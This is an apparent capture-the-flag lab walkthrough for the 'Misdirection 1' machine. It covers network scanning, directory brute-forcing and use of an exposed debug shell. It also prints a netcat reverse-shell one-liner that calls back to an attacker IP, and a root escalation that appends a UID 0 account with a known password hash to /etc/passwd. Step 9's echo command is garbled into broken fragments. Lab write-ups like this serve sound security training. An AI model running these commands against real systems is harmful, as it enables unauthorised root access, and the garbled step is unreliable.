Secuneus Labs – TryHackMe Walk-through : Misdirection 1

Penetration Testing Methodologies

Network Scan

• Netdiscover
• Nmap

Enumeration

• Directory Bruteforce

Exploit

Privilege Escalation

Walkthrough

Step 1 : Run Netdiscover tool to check all the devices connected on the same network from where you can get the IP of the target.The IP found here is 192.168.29.211

Command = sudo netdiscover -i eth0 192.168.29.91/24

Step 2 : Run Nmap tool(Nmap Aggressive) using the command on the IP of the target to check all on the open ports.

Command = nmap -A 192.168.29.211

Step 3 : So, after running nmap we found that port number 80 (HTTP) and 8080 (Appache) are open so we will check for both the open ports on the browser. 

Port 80

Port 8080

Step 4 : After checking on both the ports we did not find anything useful so now we will use the dirb tool (‘dirb’ is a command-line tool used for web application enumeration. It helps identify hidden directories on a web server by brute-forcing common directory and file names) on port number 8080 (Apache) to get the information about the hidden files.

Command = dirb http://192.168.29.211:8080

Step 5 : After scanning we found out 3 interesting links that can help us further which are http://192.168.29.211:8080/debug/, http://192.168.29.211:8080/shell/ and http://192.168.29.211:8080/wordpress/. 

When we opened the wordpress file it took us to a hidden website that was not that useful.

After that when we opened the shell link it opened up to a page where there was a link of a Parent Directory that again took us back to the Apache introduction page, hence this link was not proven useful.

But, the third link that was a debug directory link took us to a virtual shell which could possibly help us further in gaining the root access.

Step 6 : Now, we can at first check which user access we have got in this shell. In this the name of the user was www-data

Command = whoami

Furthermore, when I use the command [sudo -l], that when run by a user, it shows a list of permissions that the user has for running commands with elevated privileges using `sudo`. It’s a way for users to check what commands they are allowed to run with administrative privileges.

It provided a user called brexit that had the permission to read and write just like a root user. Also we found that with the help of user brexit we can run the shell without password.

Step 7 : Now from this it is cleared that we can use the reverse shell cheat sheet which basically means that it is a type of shell connection initiated by a target machine to a remote attacker’s system. It allows the attacker to gain command-line access to the target, providing the ability to execute commands and interact with the target’s shell.

Command [This command will be put in the target machine] = rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.29.91 4444 >/tmp/f

The above command is a mix of three different commands combine in one, in this,

rm /tmp/f means it is used to remove (delete) a file named “f” located in the “/tmp” directory.

mkfifo /tmp/f means create a named pipe named ‘f’ in the ‘/tmp’ directory.” Named pipes are often used for inter-process communication, allowing different processes to send data to each other by reading and writing to the named pipe. 

cat /tmp/f|/bin/sh -i 2>&1 means the command is essentially taking the contents of the file “/tmp/f” and feeding it as input to an interactive shell (/bin/sh). The interactive shell allows for direct interaction with the system, and by redirecting both standard output and standard error, it captures and displays any errors or messages that may occur during the execution.

|nc 192.168.29.91 4444 >/tmp/f means that this command involves the use of a Unix pipeline (|) and the nc (netcat) command. It is creating a network connection to a specified IP address and port (192.168.29.91:4444) and redirecting the data received through the connection to a file named “f” in the “/tmp” directory.

Command [This command will be put in attacker’s machine] = nc -lnvp 4444

So, when you run the above command , you are essentially telling netcat to listen on port 4444 for incoming network connections.

Step 8 : In the next step we are going to get the access of the user ‘brexit’.

Command =  sudo -u brexit /bin/bash

This command provides us a way to launch a Bash shell with ‘Brexit’ user access.

Step 9 : Furthermore to get the root access we need to make a new ID and password through which we can login as the root user and to do that,

Command = openssl passwd -1 -salt user3 pass123

The above command is instructing OpenSSL to use the MD5 algorithm with a specific salt (“user3”) to hash the password “pass123.” 

Also the above command will generate a key for further use that is $1$user3$rAGRVf5p2jYTqtqOW5cPu/

After that we will use the echo command that is used to display text or output to the terminal.

Command = echo ‘$1$user3$rAGRVf5p2jYTqtqOW5cPu/

id

:

‘

$1$user3$rAGRVf5p2jYTqtqOW5cPu/

id

:

$1$user3$rAGRVf5p2jYTqtqOW5cPu/

Step 10 : Now as it is clear that /etc/passwd can be modified by brexit we need to add some details like username, encrypted password, user ID, group ID, home directory, and the default shell in /etc/passwd to get root access.

Command = echo ‘good:$1$user3$rAGRVf5p2jYTqtqOW5cPu/:0:0::/root:/bin/bash’ >> /etc/passwd

This command adds a new user entry to the /etc/passwd file with the specified details, including a seemingly encrypted password.

After that the last step is to enter as a root user named good with password pass123 and from there we can get the root access with help of which we can get the user flag and the root flag as well.

Created By – Devansh Thapar